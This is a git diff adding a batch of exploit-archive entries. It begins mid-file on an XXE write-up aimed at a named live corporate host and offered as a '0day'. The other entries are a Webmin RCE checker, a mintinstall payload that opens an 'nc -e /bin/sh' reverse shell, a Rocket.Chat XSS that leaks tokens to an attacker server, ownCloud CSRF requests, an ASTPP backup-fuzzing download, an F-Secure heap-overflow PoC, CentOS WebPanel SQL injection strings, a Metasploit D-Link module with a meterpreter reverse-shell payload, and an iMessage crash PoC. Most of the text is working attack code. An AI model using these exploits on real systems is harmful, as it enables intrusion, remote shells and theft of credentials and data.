+	</email>
+	```
+
+	HTTP Response:
+	```
+	{
+	  "message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 2; The markup in the document preceding the root element must be well-formed.]"
+	}
+	```
+
+
+2. Verifying the vulnerability.
+
+	HTTP Request:
+	```
+	POST /api/v1.0/myself/resetPassword HTTP/1.1
+	Host: securefile.costco.com
+	Content-Type: application/xml
+	Referer: localhost
+
+	<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+	<!DOCTYPE resetPassword [
+	<!ENTITY thisactuallyexists SYSTEM "file:///dev/null">
+	]>
+	<resetPassword><email>&thisactuallyexists;&thisdoesnt;</email></resetPassword>
+	```
+
+	HTTP Response:
+	```
+	{
+	  "message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 5; columnNumber: 48; The entity "thisdoesnt" was referenced, but not declared.]"
+	}
+	```
+
+	As you can see, the parser recognizes that "thisactuallyexists" was in fact declared. In the same error, we see that "thisdoesn't" was referenced, but not declared. This demonstrates that we can declare arbitrary entities.
+
+	https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#detect-the-vulnerability
+
+
+3. External Entity Injection (XXE) (hardened)
+
+	NOTE: Because the server doesn't reflect the input anywhere, our only option is error-based XXE or out-of-band XXE. However, upon initial discovery, it appears as though most Axway SecureTransport installations have some type of firewall blocking all outgoing requests. This makes exploiting traditional XXE difficult. Judging by this, my only ideas on exploitation would be via blind SSRF or by repurposing an existing DTD on the filesystem to trigger an error with the file contents/result of our payload. However because I don't have a license, I can't effectively audit this software from a whitebox perspective, which makes mapping out internal attack surface difficult. The underlying vulnerability remains... but with restrictions.
+
+	HTTP Request:
+	```
+	POST /api/v1.0/myself/resetPassword HTTP/1.1
+	Host: securefile.costco.com
+	Content-Type: application/xml
+	Referer: localhost
+
+	<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+	<!DOCTYPE resetPassword [
+	<!ENTITY ssrf SYSTEM "http://localhost/SOMETHING_I_WISH_I_KNEW_EXISTED?NEW_PASSWORD=1337" >
+	]>
+	<resetPassword><email>&ssrf;</email></resetPassword>
+	```
+
+	HTTP Response:
+	```
+	(empty)
+	```
+
+	Local DTD repurposing example request:
+	```
+	POST /api/v1.0/myself/resetPassword HTTP/1.1
+	Host: securefile.costco.com
+	Content-Type: application/xml
+	Referer: localhost
+
+	<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+	<!DOCTYPE resetPassword [
+	    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
+
+	    <!ENTITY % expr 'aaa)>
+	        <!ENTITY &#x25; file SYSTEM "file:///FILE_TO_READ">
+	        <!ENTITY &#x25; eval "<!ENTITY &#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
+	        &#x25;eval;
+	        &#x25;error;
+	        <!ELEMENT aa (bb'>
+
+	    %local_dtd;
+	]>
+	<resetPassword></resetPassword>
+
+	```
+
+
+4. More vulnerability-indicating errors:
+
+	HTTP Request:
+	```
+	POST /api/v1.0/myself/resetPassword HTTP/1.1
+	Host: securefile.costco.com
+	Content-Type: application/xml
+	Referer: localhost
+
+	<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+	<!DOCTYPE resetPassword [
+	<!ENTITY ssrf SYSTEM a >
+	]>
+	<resetPassword><email>&ssrf;</email></resetPassword>
+	```
+
+	HTTP Response:
+	```
+	{
+	  "message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 3; columnNumber: 22; The system identifier must begin with either a single or double quote character.]"
+	}
+	```
+
+5. The original request
+
+	HTTP Request:
+	```
+	POST /api/v1.0/myself/resetPassword HTTP/1.1
+	Host: securefile.costco.com
+	Content-Type: application/xml
+	Referer: localhost
+
+	<resetPassword><email>email@email.com</email></resetPassword>
+	```
+
+	HTTP Response:
+	```
+	(empty)
+	```
+
+
+Conclusion:
+
+If a determined attacker were to get to know the Axway SecureTransport software, the chances of successfully chaining this bug are high. DTD repurposing is a relatively new technique, however in the near future we will be seeing a lot more of this attack vector due to XML parser restrictions/firewalled networks. I didn't feel comfortable doing further testing as I don't have a license, meaning I'm limited to testing against live targets. So for now, enjoy the 0day. Be creative.
+
+
+Remediation:
+
+In order to avoid this vulnerability, it's suggested to disable both doctype declaration and external general entities. You can find more information on that here: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java
+
+
+Notes:
+
+- Referer must be set.
+- Content type must be xml.
+- Successful request returns a HTTP/1.1 204 No Content
+- Any type of invalid XML throws an SAXParser exception.
+- If external entities were disabled... we should also recieve an exception.
+- Same with doctype declaration.
+- API endpoints can vary from /api/v1.0, /api/v1.1, /api/v1.2, /api/v1.3, /api/v1.4
+
+
+References:
+
+https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
+https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
+https://gist.github.com/marcwickenden/acd0b23953b52e7c1a1a90925862d8e2
+https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html
+https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
\ No newline at end of file
diff --git a/exploits/linux/webapps/47293.sh b/exploits/linux/webapps/47293.sh
new file mode 100755
index 000000000..37277996b
--- /dev/null
+++ b/exploits/linux/webapps/47293.sh
@@ -0,0 +1,31 @@
+#!/bin/sh
+#
+# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
+# based on Metasploit module https://www.exploit-db.com/exploits/47230
+# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
+# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
+#
+# Fernando A. Lagos B. (Zerial)
+# https://blog.zerial.org
+# https://blog.nivel4.com
+#
+# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
+#
+# Usage: sh CVE-2019-15107.sh https://target:port
+# Example: sh CVE-2019-15107.sh https://localhost:10000
+# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
+#
+
+FLAG="f3a0c13c3765137bcde68572707ae5c0"
+URI=$1;
+
+echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
+curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1
+
+if [ $? -eq 0 ];
+then
+	echo '\033[0;31mVULNERABLE!\033[0m'
+else
+	echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
+fi
+#EOF
\ No newline at end of file
diff --git a/exploits/linux/webapps/47457.py b/exploits/linux/webapps/47457.py
new file mode 100755
index 000000000..3bc35e4c8
--- /dev/null
+++ b/exploits/linux/webapps/47457.py
@@ -0,0 +1,20 @@
+# Exploit Title: mintinstall (aka Software Manager) object injection
+# Date: 10/02/2019
+# Exploit Author: Andhrimnirr
+# Vendor Homepage: https://www.linuxmint.com/
+# Software Link: mintinstall (aka Software Manager)
+# Version: 7.9.9
+# Tested on: Linux Mint
+# CVE : CVE-2019-17080
+
+
+import os
+import sys
+def shellCode(payload):
+    with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb:
+        wb.write(payload)
+    print("[+] Start mintinstall")
+if __name__=="__main__":
+    shellCode(f"""cos\nsystem\n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"\ntR.""")
+else:
+    print("[!] exploit.py [IP] [PORT]")
\ No newline at end of file
diff --git a/exploits/linux/webapps/47537.txt b/exploits/linux/webapps/47537.txt
new file mode 100644
index 000000000..d16ebe543
--- /dev/null
+++ b/exploits/linux/webapps/47537.txt
@@ -0,0 +1,25 @@
+# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
+# Author: 3H34N
+# Date: 2019-10-22
+# Product: Rocket.Chat
+# Vendor: https://rocket.chat/
+# Vulnerable Version(s): Rocket.Chat < 2.1.0
+# CVE: CVE-2019-17220
+# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)
+
+# PoC
+# 1. Create l33t.php on a web server
+
+<?php
+$output = fopen("logs.txt", "a+") or die("WTF? o.O");
+$leet = $_GET['leet']."\n\n";
+fwrite($output, $leet);
+fclose($output);
+?>
+
+# 2. Open a chat session
+# 3. Send payload with your web server url
+
+![title](http://10.10.1.5/l33t.php?leet=+`{}token`)
+
+# 4. Token will be written in logs.txt when target seen your message.
\ No newline at end of file
diff --git a/exploits/linux/webapps/47571.txt b/exploits/linux/webapps/47571.txt
new file mode 100644
index 000000000..7447fba93
--- /dev/null
+++ b/exploits/linux/webapps/47571.txt
@@ -0,0 +1,280 @@
+# Exploit Title: ownCloud 10.3.0 stable - Cross-Site Request Forgery
+# Date: 2019-10-31
+# Exploit Author: Ozer Goker
+# Vendor Homepage: https://owncloud.org
+# Software Link: https://owncloud.org/download/
+# Version: 10.3
+# CVE: N/A
+
+# Introduction
+# Your personal cloud collaboration platform With over 50 million users
+# worldwide, ownCloud is the market-leading open source software for
+# cloud-based collaboration platforms. As an alternative to Dropbox, OneDrive
+# and Google Drive, ownCloud offers real data security and privacy for you
+# and your data.
+
+##################################################################################################################################
+
+# CSRF1
+# Create Folder
+
+MKCOL /remote.php/dav/files/user/test HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+requesttoken:
+VREONXtUByUsCkMAcRscHjUGHjYGPBoHJQgsfzoHWEk=:fUCe0mdAzn0T3MNKlKqYMEBFcezMTukbmbVeDs+jKlo=
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+
+##################################################################################################################################
+
+# CSRF2
+# Delete Folder
+
+DELETE /remote.php/dav/files/user/test HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+requesttoken:
+HDQcAi5jLSkkKysEGiYxZSA7PhcaCWEYFydhQ106YEM=:/pQReZNMrOXPXpc0yvQxQp9YQJ7q3HShA9D2+R2EJuI=
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+
+##################################################################################################################################
+
+# CSRF3
+# Create User
+
+POST /index.php/settings/users/users HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+eRIlHRIBJF0jU1w9CSY+AT8CX18gTh90JV8UQwQdfEg=:JVhMY8G9u7/iKplTfO00k7G5c2BqjoOcCWkAHYdZV5I=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 39
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+username=test&password=&email=test@test
+
+
+
+##################################################################################################################################
+
+# CSRF4
+# Delete User
+
+DELETE /index.php/settings/users/users/test HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+BQ8vIjp9LjACFxwEB2QkMSsuG14kHy4SKio6URckUlk=:6KbrqDMTTsoPE2vdrct1ofvSlGlcyVarSAOFV9PFuLQ=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+
+##################################################################################################################################
+
+# CSRF5
+# Create Group
+
+POST /index.php/settings/users/groups HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+BRd8ZDsAFREkB0YxdAIaYi8/ABsyCBIDExs/Wgw9a28=:6S14p9vurc5e6TH7vrotyqJBUvihbOXDUWMKYbS23UU=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 7
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+id=test
+
+
+##################################################################################################################################
+
+# CSRF6
+# Delete Group
+
+DELETE /index.php/settings/users/groups/test HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+aTElBwBqTAUYEEQacjdgER4hJ0QIA20sdF00CwtHUm0=:ZuhWKS/aNt7N0a2DGlH+Cz5m20b9e5aFOSBKkqJOALw=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+
+##################################################################################################################################
+
+# CSRF7
+# Change User Full Name
+
+POST /index.php/settings/users/user/displayName HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+fzYYPjtaVBUeKj8CBzojJHIgXTkTTT4GbR0vBT4TCm0=:LrUnpc7qHNLVElqq+m2VX4fG+py7Pa9FK8DpB84dSdY=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 37
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+displayName=user1&oldDisplayName=user
+
+
+##################################################################################################################################
+
+# CSRF8
+# Change User Email
+
+PUT /index.php/settings/users/user/mailAddress HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+QAkuGRpIMg88IzsXBTMeYREpCA4zLhcQHiMsQBo7WWo=:sMcIQqQkjGHCGeL4HdgaxWOQXNzrtIjAou6akezvpcI=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 31
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+mailAddress=user1%40example.com
+
+
+##################################################################################################################################
+
+# CSRF9
+# Change User Password
+
+
+POST /index.php/settings/personal/changepassword HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 62
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+oldpassword=1234&personal-password=1&personal-password-clone=1
+
+
+##################################################################################################################################
+
+# CSRF10
+# Change Language
+
+POST /index.php/settings/ajax/setlanguage.php HTTP/1.1
+Host: 192.168.2.111
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 7
+Origin: http://192.168.2.111
+DNT: 1
+Connection: close
+Cookie:
+oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
+ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k
+
+lang=tr
+
+
+##################################################################################################################################
\ No newline at end of file
diff --git a/exploits/linux/webapps/47900.txt b/exploits/linux/webapps/47900.txt
new file mode 100644
index 000000000..7f1fec921
--- /dev/null
+++ b/exploits/linux/webapps/47900.txt
@@ -0,0 +1,56 @@
+# Exploit Title: ASTPP 4.0.1 VoIP Billing - Database Backup Download
+# Date: 2019-11-18
+# Exploit Author: Fabien AUNAY
+# Vendor Homepage: https://www.astppbilling.org/
+# Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1
+# Version: 4.0.1 vendor default setup script
+# Tested on: Debian 9 - CentOS 7
+# CVE : -
+
+###########################################################################################################
+ASTPP 4.0.1 VoIP Billing Unauthenticated Predictable database backup download
+
+A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers!
+It is available as an open source solution. It means without any investment, one can start his telephony
+business using ASTPP.
+ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a
+comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing
+solution to “A Smart TelePhony Platform”.
+The latest version of ASTPP is provisioned with some advanced functional modules which are designed
+to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class
+4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart
+Technology.
+
+When administrator performs a ASTPP backup in web interface (Configuration / Database Restore / Create)
+the file name follows a semi-predictable pattern located in /var/www/html/astpp/database_backup/.
+
+The file name can be FUZZED for data exfiltration with the following pattern: astpp_20200110080136.sql.gz
+
+Pattern review:
+- astpp_
+- year
+- month
+- day
+- 6 PIN digit
+
+Steps:
+Objective 1 : Generate your 6 PIN list
+Objective 2 : FUZZ the target URL
+Objective 3 : Download the mysqldump
+
+###########################################################################################################
+
+Objective 1: Generate your 6 PIN list
+POC: crunch 6 6 0123456789 > pin_fuzzer.list
+
+Objective 2 : FUZZ the target URL
+POC: wfuzz --hc 302 -w pin_fuzzer.list 'http://127.0.0.1/database_backup/astpp_20200110FUZZ.sql.gz'
+===================================================================
+ID           Response   Lines    Word     Chars       Payload
+===================================================================
+
+000080137:   200        1135 L   6859 W   550239 Ch   "080136"
+
+Objective 3 : Download the mysqldump
+POC: wget http://127.0.0.1/database_backup/astpp_20200110080136.sql.gz
+astpp_20200110080136.sql.gz             100%[===============================================================================>] 296,70K  1,05MB/s    ds 0,3
\ No newline at end of file
diff --git a/exploits/linux/webapps/47996.py b/exploits/linux/webapps/47996.py
new file mode 100755
index 000000000..ff8888fb1
--- /dev/null
+++ b/exploits/linux/webapps/47996.py
@@ -0,0 +1,62 @@
+# Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)
+# Date: 2020-01-30
+# Author: Kevin Joensen
+# Vendor: F-Secure
+# Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper
+# CVE: N/A
+# Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html
+
+from pwn import *
+import time
+import sys
+
+
+
+def send_payload(payload, content_len=21487483844, nofun=False):
+    r = remote(sys.argv[1], 9012)
+    r.send("POST / HTTP/1.1\n")
+    r.send("Host: 192.168.0.122:9012\n")
+    r.send("Content-Length: {}\n".format(content_len))
+    r.send("\n")
+    r.send(payload)
+    if not nofun:
+        r.send("\n\n")
+    return r
+
+
+def trigger_exploit():
+    print "Triggering exploit"
+    payload = ""
+    payload += "A" * 12             # Padding
+    payload += p32(0x1d)            # Fast bin chunk overwrite
+    payload += "A"* 488             # Padding
+    payload += p32(0xdda00771)      # Address of payload
+    payload += p32(0xdda00771+4)    # Junk
+    r = send_payload(payload)
+
+
+
+def massage_heap(filename):
+        print "Trying to massage the heap....."
+        for x in xrange(100):
+            payload = ""
+            payload += p32(0x0)             # Needed to bypass checks
+            payload += p32(0x0)             # Needed to bypass checks
+            payload += p32(0xdda0077d)      # Points to where the filename will be in memory
+            payload += filename + "\x00"
+            payload += "C"*(0x300-len(payload))
+            r = send_payload(payload, content_len=0x80000, nofun=True)
+            r.close()
+            cut_conn = True
+        print "Heap massage done"
+
+
+if __name__ == "__main__":
+    if len(sys.argv) != 3:
+        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
+        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
+        exit()
+    massage_heap(sys.argv[2])
+    time.sleep(1)
+    trigger_exploit()
+    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])
\ No newline at end of file
diff --git a/exploits/linux/webapps/48212.txt b/exploits/linux/webapps/48212.txt
new file mode 100644
index 000000000..1932a8908
--- /dev/null
+++ b/exploits/linux/webapps/48212.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection
+# Google Dork: N/A
+# Date: 2020-03-03
+# Exploit Author: Berke YILMAZ
+# Vendor Homepage: http://centos-webpanel.com/
+# Software Link: http://centos-webpanel.com/
+# Version: v6 - v7
+# Tested on: Kali Linux - Windows 10
+# CVE : CVE-2020-10230
+
+# Type: Error Based SQL Injection
+# Payload:
+https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'
+AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT
+(ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO
+
+
+# Type: Time Based SQL Injection
+# Payload:
+https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'
+OR SLEEP(5)-- JCpP
+
+Centos-Webpanel (http://centos-webpanel.com/)
+CentOS Web Panel | Free Linux Web Hosting Control Panel
+Free CentOS Linux Web Hosting control panel designed for quick and easy
+management of (Dedicated & VPS) servers without of need to use ssh console
+for every little thing
\ No newline at end of file
diff --git a/exploits/linux_mips/remote/48037.rb b/exploits/linux_mips/remote/48037.rb
new file mode 100755
index 000000000..f989c9aab
--- /dev/null
+++ b/exploits/linux_mips/remote/48037.rb
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
+      'Description' => %q{
+        D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
+      },
+      'Author'      =>
+        [
+          's1kr10s',
+          'secenv'
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2019-20215'],
+          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
+        ],
+      'DisclosureDate' => 'Dec 24 2019',
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Arch'        => ARCH_MIPSBE,
+      'DefaultOptions' =>
+        {
+            'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
+            'CMDSTAGER::FLAVOR' => 'wget',
+            'RPORT' => '1900'
+        },
+      'Targets'        =>
+        [
+          [ 'Auto',	{ } ],
+        ],
+      'CmdStagerFlavor' => %w{ echo wget },
+      'DefaultTarget'  => 0
+      ))
+
+  register_options(
+    [
+      Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
+    ])
+  end
+
+  def exploit
+    execute_cmdstager(linemax: 1500)
+  end
+
+  def execute_command(cmd, opts)
+    type = datastore['VECTOR']
+    if type == "URN"
+      print_status("Target Payload URN")
+      val = "urn:device:1;`#{cmd}`"
+    else
+      print_status("Target Payload UUID")
+      val = "uuid:`#{cmd}`"
+    end
+
+    connect_udp
+    header = "M-SEARCH * HTTP/1.1\r\n"
+    header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
+    header << "ST:#{val}\r\n"
+    header << "Man:\"ssdp:discover\"\r\n"
+    header << "MX:2\r\n\r\n"
+    udp_sock.put(header)
+    disconnect_udp
+  end
+end
\ No newline at end of file
diff --git a/exploits/macos/dos/47207.txt b/exploits/macos/dos/47207.txt
new file mode 100644
index 000000000..cb0408963
--- /dev/null
+++ b/exploits/macos/dos/47207.txt
@@ -0,0 +1,18 @@
+There is a heap overflow in [NSURL initWithCoder:] that can be reached via iMessage and likely other paths. When an NSURL is deserialized, one property its plist can contain is NS.minimalBookmarkData, which is then used as a parameter for [NSURL URLByResolvingBookmarkData:options:relativeToURL:bookmarkDataIsStale:error:]. This method uses a wide variety of code to parse the provided bookmark data. On a Mac, if the data is a pre-2012 alias file, it will be processed using the FSResolveAliasWithMountFlags function in the CarbonCore framework. This function can eventually call ALI_GetUTF8Path, which has an unsafe call to strcat_chk, leading to memory corruption. 
+
+To reproduce the issue with the files in carboncrash.zip:
+
+1) install frida (pip3 install frida)
+2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
+3) in injectMessage.js replace the marker "PATH" with the path of the obj file
+4) in the local directory, run:
+
+python3 sendMessage.py
+
+This will lead to a crash in soagent requiring no user interaction. Note that this issue affects Macs only, this PoC will crash an iPhone, but it is an unexploitable and unrelated crash due to an exception.
+
